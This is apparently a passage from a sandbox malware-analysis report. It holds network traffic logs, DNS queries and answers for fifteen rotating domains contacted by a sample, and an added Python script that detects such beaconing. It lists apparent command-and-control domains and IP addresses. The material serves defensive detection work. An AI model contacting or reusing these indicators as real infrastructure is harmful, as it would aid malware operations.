                                                                                                        Nov 6, 2024 08:41:20.765266895 CET8050009154.23.184.218192.168.2.6
                                                                                                        Nov 6, 2024 08:41:20.765374899 CET5000980192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:41:20.776249886 CET5000980192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:41:20.781075954 CET8050009154.23.184.218192.168.2.6
                                                                                                        Nov 6, 2024 08:41:21.718147039 CET8050009154.23.184.218192.168.2.6
                                                                                                        Nov 6, 2024 08:41:21.763238907 CET5000980192.168.2.6154.23.184.218
                                                                                                        Nov 6, 2024 08:42:19.923552036 CET8050027161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:19.923798084 CET8050027161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:19.926700115 CET5002780192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:20.044250011 CET8050027161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:20.044312000 CET5002780192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:20.603662968 CET5002780192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:21.623181105 CET5002880192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:21.628225088 CET8050028161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:21.628323078 CET5002880192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:21.640878916 CET5002880192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:21.645723104 CET8050028161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:21.645909071 CET8050028161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:22.488420010 CET8050028161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:22.488435984 CET8050028161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:22.488516092 CET5002880192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:22.616187096 CET8050028161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:22.616241932 CET5002880192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:23.151578903 CET5002880192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:24.170597076 CET5002980192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:24.175683022 CET8050029161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:24.175755978 CET5002980192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:24.184984922 CET5002980192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:24.190838099 CET8050029161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:25.010678053 CET8050029161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:25.010694027 CET8050029161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:25.010711908 CET8050029161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:25.010909081 CET5002980192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:25.130696058 CET8050029161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:25.134015083 CET5002980192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:25.137881041 CET5002980192.168.2.6161.97.142.144
                                                                                                        Nov 6, 2024 08:42:25.143022060 CET8050029161.97.142.144192.168.2.6
                                                                                                        Nov 6, 2024 08:42:30.221756935 CET5003080192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:30.226550102 CET8050030199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:30.226614952 CET5003080192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:30.242670059 CET5003080192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:30.247457981 CET8050030199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:30.853243113 CET8050030199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:30.853271961 CET8050030199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:30.853334904 CET5003080192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:30.853601933 CET8050030199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:30.853643894 CET5003080192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:31.763257980 CET5003080192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:32.778889894 CET5003180192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:32.784781933 CET8050031199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:32.784917116 CET5003180192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:32.796104908 CET5003180192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:32.801122904 CET8050031199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:33.416079998 CET8050031199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:33.416104078 CET8050031199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:33.416564941 CET5003180192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:33.417819023 CET8050031199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:33.419332981 CET5003180192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:34.306804895 CET5003180192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:35.326435089 CET5003280192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:35.331424952 CET8050032199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:35.331511974 CET5003280192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:35.343238115 CET5003280192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:35.348176003 CET8050032199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:35.348186970 CET8050032199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:35.969959021 CET8050032199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:35.969991922 CET8050032199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:35.970041037 CET5003280192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:36.308271885 CET8050032199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:36.308332920 CET5003280192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:36.853719950 CET5003280192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:37.873071909 CET5003380192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:37.878149986 CET8050033199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:37.878288031 CET5003380192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:37.893212080 CET5003380192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:37.899089098 CET8050033199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:38.519113064 CET8050033199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:38.519882917 CET8050033199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:38.519892931 CET8050033199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:38.520024061 CET5003380192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:38.522944927 CET5003380192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:38.522944927 CET5003380192.168.2.6199.59.243.227
                                                                                                        Nov 6, 2024 08:42:38.528259039 CET8050033199.59.243.227192.168.2.6
                                                                                                        Nov 6, 2024 08:42:43.563240051 CET5003480192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:43.568043947 CET8050034188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:43.569310904 CET5003480192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:43.581168890 CET5003480192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:43.586076975 CET8050034188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:44.565088987 CET8050034188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:44.567439079 CET8050034188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:44.567492008 CET5003480192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:45.088124037 CET5003480192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:46.140965939 CET5003580192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:46.145840883 CET8050035188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:46.145996094 CET5003580192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:46.194065094 CET5003580192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:46.198856115 CET8050035188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:47.147092104 CET8050035188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:47.149185896 CET8050035188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:47.149296999 CET5003580192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:47.697390079 CET5003580192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:48.716188908 CET5003680192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:48.721616983 CET8050036188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:48.721704006 CET5003680192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:48.732590914 CET5003680192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:48.737407923 CET8050036188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:48.737508059 CET8050036188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:49.746179104 CET8050036188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:49.749083042 CET8050036188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:49.751292944 CET5003680192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:50.244266033 CET5003680192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:51.267227888 CET5003780192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:51.273732901 CET8050037188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:51.275338888 CET5003780192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:51.283243895 CET5003780192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:51.288582087 CET8050037188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:52.286896944 CET8050037188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:52.286912918 CET8050037188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:52.286927938 CET8050037188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:52.286940098 CET8050037188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:52.286948919 CET8050037188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:52.286959887 CET8050037188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:52.287024021 CET8050037188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:52.287066936 CET5003780192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:52.287106991 CET5003780192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:52.287739038 CET8050037188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:52.287776947 CET5003780192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:52.300640106 CET5003780192.168.2.6188.114.97.3
                                                                                                        Nov 6, 2024 08:42:52.305725098 CET8050037188.114.97.3192.168.2.6
                                                                                                        Nov 6, 2024 08:42:58.021720886 CET5003880192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:42:58.026551962 CET80500383.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:42:58.026640892 CET5003880192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:42:58.038606882 CET5003880192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:42:58.043526888 CET80500383.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:42:58.661890030 CET80500383.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:42:58.661948919 CET5003880192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:42:59.543231010 CET5003880192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:42:59.746974945 CET80500383.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:43:00.561873913 CET5003980192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:43:00.567105055 CET80500393.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:43:00.567220926 CET5003980192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:43:00.580977917 CET5003980192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:43:00.585810900 CET80500393.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:43:01.193587065 CET80500393.33.130.190192.168.2.6
                                                                                                        Nov 6, 2024 08:43:01.193658113 CET5003980192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:43:03.338089943 CET5003980192.168.2.63.33.130.190
                                                                                                        Nov 6, 2024 08:43:03.343008995 CET80500393.33.130.190192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 6, 2024 08:39:41.594624043 CET | 65476 | 53 | 192.168.2.6 | 1.1.1.1
Nov 6, 2024 08:39:42.490822077 CET | 53 | 65476 | 1.1.1.1 | 192.168.2.6
Nov 6, 2024 08:39:58.708657026 CET | 59233 | 53 | 192.168.2.6 | 1.1.1.1
Nov 6, 2024 08:39:58.720695019 CET | 53 | 59233 | 1.1.1.1 | 192.168.2.6
Nov 6, 2024 08:40:12.157268047 CET | 62314 | 53 | 192.168.2.6 | 1.1.1.1
Nov 6, 2024 08:40:12.281466961 CET | 53 | 62314 | 1.1.1.1 | 192.168.2.6
Nov 6, 2024 08:40:25.685594082 CET | 63350 | 53 | 192.168.2.6 | 1.1.1.1
Nov 6, 2024 08:40:25.729809999 CET | 53 | 63350 | 1.1.1.1 | 192.168.2.6
Nov 6, 2024 08:40:39.373497009 CET | 55056 | 53 | 192.168.2.6 | 1.1.1.1
Nov 6, 2024 08:40:39.392317057 CET | 53 | 55056 | 1.1.1.1 | 192.168.2.6
Nov 6, 2024 08:40:52.907351017 CET | 59235 | 53 | 192.168.2.6 | 1.1.1.1
Nov 6, 2024 08:40:52.951142073 CET | 53 | 59235 | 1.1.1.1 | 192.168.2.6
Nov 6, 2024 08:41:06.422233105 CET | 64311 | 53 | 192.168.2.6 | 1.1.1.1
Nov 6, 2024 08:41:06.742695093 CET | 53 | 64311 | 1.1.1.1 | 192.168.2.6
Nov 6, 2024 08:41:20.124200106 CET | 51066 | 53 | 192.168.2.6 | 1.1.1.1
Nov 6, 2024 08:41:20.757752895 CET | 53 | 51066 | 1.1.1.1 | 192.168.2.6
Nov 6, 2024 08:41:34.577125072 CET | 55531 | 53 | 192.168.2.6 | 1.1.1.1
Nov 6, 2024 08:41:34.685213089 CET | 53 | 55531 | 1.1.1.1 | 192.168.2.6
Nov 6, 2024 08:41:48.562402010 CET | 55227 | 53 | 192.168.2.6 | 1.1.1.1
Nov 6, 2024 08:41:48.763184071 CET | 53 | 55227 | 1.1.1.1 | 192.168.2.6
Nov 6, 2024 08:42:02.281193972 CET | 49263 | 53 | 192.168.2.6 | 1.1.1.1
Nov 6, 2024 08:42:02.410065889 CET | 53 | 49263 | 1.1.1.1 | 192.168.2.6
Nov 6, 2024 08:42:16.280123949 CET | 60299 | 53 | 192.168.2.6 | 1.1.1.1
Nov 6, 2024 08:42:16.341783047 CET | 53 | 60299 | 1.1.1.1 | 192.168.2.6
Nov 6, 2024 08:42:30.147758007 CET | 63589 | 53 | 192.168.2.6 | 1.1.1.1
Nov 6, 2024 08:42:30.217531919 CET | 53 | 63589 | 1.1.1.1 | 192.168.2.6
Nov 6, 2024 08:42:43.537723064 CET | 51569 | 53 | 192.168.2.6 | 1.1.1.1
Nov 6, 2024 08:42:43.557391882 CET | 53 | 51569 | 1.1.1.1 | 192.168.2.6
Nov 6, 2024 08:42:57.310529947 CET | 63473 | 53 | 192.168.2.6 | 1.1.1.1
Nov 6, 2024 08:42:58.018017054 CET | 53 | 63473 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 6, 2024 08:39:41.594624043 CET | 192.168.2.6 | 1.1.1.1 | 0x3838 | Standard query (0) | www.huiguang.xyz | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:39:58.708657026 CET | 192.168.2.6 | 1.1.1.1 | 0xbe17 | Standard query (0) | www.beingandbecoming.ltd | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:40:12.157268047 CET | 192.168.2.6 | 1.1.1.1 | 0x9b29 | Standard query (0) | www.futurevision.life | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:40:25.685594082 CET | 192.168.2.6 | 1.1.1.1 | 0x4f79 | Standard query (0) | www.schedulemassage.xyz | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:40:39.373497009 CET | 192.168.2.6 | 1.1.1.1 | 0x9f42 | Standard query (0) | www.mcfunding.org | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:40:52.907351017 CET | 192.168.2.6 | 1.1.1.1 | 0x79dd | Standard query (0) | www.migorengya8.click | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:41:06.422233105 CET | 192.168.2.6 | 1.1.1.1 | 0x5068 | Standard query (0) | www.klohk.tech | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:41:20.124200106 CET | 192.168.2.6 | 1.1.1.1 | 0x5b7b | Standard query (0) | www.d63dm.top | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:41:34.577125072 CET | 192.168.2.6 | 1.1.1.1 | 0xdbe6 | Standard query (0) | www.servannto.site | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:41:48.562402010 CET | 192.168.2.6 | 1.1.1.1 | 0x8f6f | Standard query (0) | www.telforce.one | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:42:02.281193972 CET | 192.168.2.6 | 1.1.1.1 | 0x8308 | Standard query (0) | www.cesach.net | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:42:16.280123949 CET | 192.168.2.6 | 1.1.1.1 | 0x4861 | Standard query (0) | www.030002128.xyz | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:42:30.147758007 CET | 192.168.2.6 | 1.1.1.1 | 0x165c | Standard query (0) | www.auto-deals-cz-000.buzz | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:42:43.537723064 CET | 192.168.2.6 | 1.1.1.1 | 0xeef9 | Standard query (0) | www.bzxs.info | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:42:57.310529947 CET | 192.168.2.6 | 1.1.1.1 | 0xd025 | Standard query (0) | www.econsultoria.online | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 6, 2024 08:39:42.490822077 CET | 1.1.1.1 | 192.168.2.6 | 0x3838 | No error (0) | www.huiguang.xyz | | 154.92.61.37 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:39:58.720695019 CET | 1.1.1.1 | 192.168.2.6 | 0xbe17 | No error (0) | www.beingandbecoming.ltd | beingandbecoming.ltd | | CNAME (Canonical name) | IN (0x0001) | false
Nov 6, 2024 08:39:58.720695019 CET | 1.1.1.1 | 192.168.2.6 | 0xbe17 | No error (0) | beingandbecoming.ltd | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:39:58.720695019 CET | 1.1.1.1 | 192.168.2.6 | 0xbe17 | No error (0) | beingandbecoming.ltd | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:40:12.281466961 CET | 1.1.1.1 | 192.168.2.6 | 0x9b29 | No error (0) | www.futurevision.life | | 203.161.49.193 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:40:25.729809999 CET | 1.1.1.1 | 192.168.2.6 | 0x4f79 | No error (0) | www.schedulemassage.xyz | schedulemassage.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Nov 6, 2024 08:40:25.729809999 CET | 1.1.1.1 | 192.168.2.6 | 0x4f79 | No error (0) | schedulemassage.xyz | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:40:25.729809999 CET | 1.1.1.1 | 192.168.2.6 | 0x4f79 | No error (0) | schedulemassage.xyz | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:40:39.392317057 CET | 1.1.1.1 | 192.168.2.6 | 0x9f42 | No error (0) | www.mcfunding.org | mcfunding.org | | CNAME (Canonical name) | IN (0x0001) | false
Nov 6, 2024 08:40:39.392317057 CET | 1.1.1.1 | 192.168.2.6 | 0x9f42 | No error (0) | mcfunding.org | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:40:39.392317057 CET | 1.1.1.1 | 192.168.2.6 | 0x9f42 | No error (0) | mcfunding.org | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:40:52.951142073 CET | 1.1.1.1 | 192.168.2.6 | 0x79dd | No error (0) | www.migorengya8.click | migorengya8.click | | CNAME (Canonical name) | IN (0x0001) | false
Nov 6, 2024 08:40:52.951142073 CET | 1.1.1.1 | 192.168.2.6 | 0x79dd | No error (0) | migorengya8.click | | 198.252.98.54 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:41:06.742695093 CET | 1.1.1.1 | 192.168.2.6 | 0x5068 | No error (0) | www.klohk.tech | | 103.224.182.242 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:41:20.757752895 CET | 1.1.1.1 | 192.168.2.6 | 0x5b7b | No error (0) | www.d63dm.top | d63dm.top | | CNAME (Canonical name) | IN (0x0001) | false
Nov 6, 2024 08:41:20.757752895 CET | 1.1.1.1 | 192.168.2.6 | 0x5b7b | No error (0) | d63dm.top | | 154.23.184.218 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:41:34.685213089 CET | 1.1.1.1 | 192.168.2.6 | 0xdbe6 | No error (0) | www.servannto.site | | 31.31.196.17 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:41:48.763184071 CET | 1.1.1.1 | 192.168.2.6 | 0x8f6f | No error (0) | www.telforce.one | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:41:48.763184071 CET | 1.1.1.1 | 192.168.2.6 | 0x8f6f | No error (0) | www.telforce.one | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:42:02.410065889 CET | 1.1.1.1 | 192.168.2.6 | 0x8308 | No error (0) | www.cesach.net | | 217.76.156.252 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:42:16.341783047 CET | 1.1.1.1 | 192.168.2.6 | 0x4861 | No error (0) | www.030002128.xyz | | 161.97.142.144 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:42:30.217531919 CET | 1.1.1.1 | 192.168.2.6 | 0x165c | No error (0) | www.auto-deals-cz-000.buzz | | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:42:43.557391882 CET | 1.1.1.1 | 192.168.2.6 | 0xeef9 | No error (0) | www.bzxs.info | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:42:43.557391882 CET | 1.1.1.1 | 192.168.2.6 | 0xeef9 | No error (0) | www.bzxs.info | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:42:58.018017054 CET | 1.1.1.1 | 192.168.2.6 | 0xd025 | No error (0) | www.econsultoria.online | econsultoria.online | | CNAME (Canonical name) | IN (0x0001) | false
Nov 6, 2024 08:42:58.018017054 CET | 1.1.1.1 | 192.168.2.6 | 0xd025 | No error (0) | econsultoria.online | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 08:42:58.018017054 CET | 1.1.1.1 | 192.168.2.6 | 0xd025 | No error (0) | econsultoria.online | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                                                                                                        • www.huiguang.xyz
                                                                                                        • www.beingandbecoming.ltd
                                                                                                        • www.futurevision.life
                                                                                                        • www.schedulemassage.xyz
                                                                                                        • www.mcfunding.org
                                                                                                        • www.migorengya8.click
                                                                                                        • www.klohk.tech
                                                                                                        • www.d63dm.top
                                                                                                        • www.servannto.site
                                                                                                        • www.telforce.one
                                                                                                        • www.cesach.net
                                                                                                        • www.030002128.xyz
                                                                                                        • www.auto-deals-cz-000.buzz
                                                                                                        • www.bzxs.info
                                                                                                        • www.econsultoria.online
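The query table above shows the sample resolving a different name roughly every 13.5 seconds and never asking for the same one twice, and several of those names resolve to the same address pair (3.33.130.190 / 15.197.148.33). The script below is an added example, not part of the Joe Sandbox report: it takes the timestamps and names copied from the DNS query and answer tables, measures how regular the lookup timer is, and groups names by the address set they resolve to. The helper names, the thresholds (min_distinct, max_cv) and the benign control in the test are this example's own assumptions.

```python
"""Spot FormBook-style domain rotation in a DNS query log.

Added example, not part of the Joe Sandbox report. QUERIES and ANSWERS are
copied from the report's DNS query / answer tables; the parsing helpers,
thresholds and the shared-hosting grouping are this example's own assumptions.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# (timestamp, queried name) as printed in the "DNS queries" table
QUERIES = [
    ("Nov 6, 2024 08:39:41.594624043 CET", "www.huiguang.xyz"),
    ("Nov 6, 2024 08:39:58.708657026 CET", "www.beingandbecoming.ltd"),
    ("Nov 6, 2024 08:40:12.157268047 CET", "www.futurevision.life"),
    ("Nov 6, 2024 08:40:25.685594082 CET", "www.schedulemassage.xyz"),
    ("Nov 6, 2024 08:40:39.373497009 CET", "www.mcfunding.org"),
    ("Nov 6, 2024 08:40:52.907351017 CET", "www.migorengya8.click"),
    ("Nov 6, 2024 08:41:06.422233105 CET", "www.klohk.tech"),
    ("Nov 6, 2024 08:41:20.124200106 CET", "www.d63dm.top"),
    ("Nov 6, 2024 08:41:34.577125072 CET", "www.servannto.site"),
    ("Nov 6, 2024 08:41:48.562402010 CET", "www.telforce.one"),
    ("Nov 6, 2024 08:42:02.281193972 CET", "www.cesach.net"),
    ("Nov 6, 2024 08:42:16.280123949 CET", "www.030002128.xyz"),
    ("Nov 6, 2024 08:42:30.147758007 CET", "www.auto-deals-cz-000.buzz"),
    ("Nov 6, 2024 08:42:43.537723064 CET", "www.bzxs.info"),
    ("Nov 6, 2024 08:42:57.310529947 CET", "www.econsultoria.online"),
]

# (answer name, address) for the A records in the "DNS answers" table
ANSWERS = [
    ("www.huiguang.xyz", "154.92.61.37"),
    ("beingandbecoming.ltd", "3.33.130.190"), ("beingandbecoming.ltd", "15.197.148.33"),
    ("www.futurevision.life", "203.161.49.193"),
    ("schedulemassage.xyz", "3.33.130.190"), ("schedulemassage.xyz", "15.197.148.33"),
    ("mcfunding.org", "3.33.130.190"), ("mcfunding.org", "15.197.148.33"),
    ("migorengya8.click", "198.252.98.54"),
    ("www.klohk.tech", "103.224.182.242"),
    ("d63dm.top", "154.23.184.218"),
    ("www.servannto.site", "31.31.196.17"),
    ("www.telforce.one", "13.248.169.48"), ("www.telforce.one", "76.223.54.146"),
    ("www.cesach.net", "217.76.156.252"),
    ("www.030002128.xyz", "161.97.142.144"),
    ("www.auto-deals-cz-000.buzz", "199.59.243.227"),
    ("www.bzxs.info", "188.114.97.3"), ("www.bzxs.info", "188.114.96.3"),
    ("econsultoria.online", "3.33.130.190"), ("econsultoria.online", "15.197.148.33"),
]


def parse_ts(text):
    """Parse a Joe Sandbox timestamp: it carries nanoseconds, datetime takes microseconds."""
    stamp, _, _zone = text.rpartition(" ")          # drop the trailing zone name
    head, _, frac = stamp.partition(".")
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def rotation_stats(queries):
    """Distinct-name count and inter-query gap statistics for one host's lookups."""
    times = [parse_ts(t) for t, _ in queries]
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    names = [n for _, n in queries]
    avg = mean(gaps) if gaps else 0.0
    return {
        "total": len(names),
        "distinct": len(set(names)),
        "mean_gap": avg,
        # coefficient of variation: close to 0 means a fixed timer drives the lookups
        "gap_cv": (pstdev(gaps) / avg) if len(gaps) > 1 and avg > 0 else None,
    }


def is_rotating_beacon(queries, min_distinct=8, max_cv=0.25):
    """True when a host walks a list of never-repeated names on a steady timer."""
    s = rotation_stats(queries)
    if s["gap_cv"] is None or s["distinct"] < min_distinct:
        return False
    return s["distinct"] == s["total"] and s["gap_cv"] <= max_cv


def shared_hosting(answers):
    """Group names by the exact set of addresses they resolve to.

    Names that share one address set sit on the same endpoint; that is worth
    checking before every name in the rotation is treated as a live C2.
    """
    by_name = defaultdict(set)
    for name, addr in answers:
        by_name[name].add(addr)
    by_addrs = defaultdict(list)
    for name, addrs in by_name.items():
        by_addrs[frozenset(addrs)].append(name)
    return {addrs: sorted(names) for addrs, names in by_addrs.items() if len(names) > 1}


if __name__ == "__main__":
    print(rotation_stats(QUERIES))
    print("rotating beacon:", is_rotating_beacon(QUERIES))
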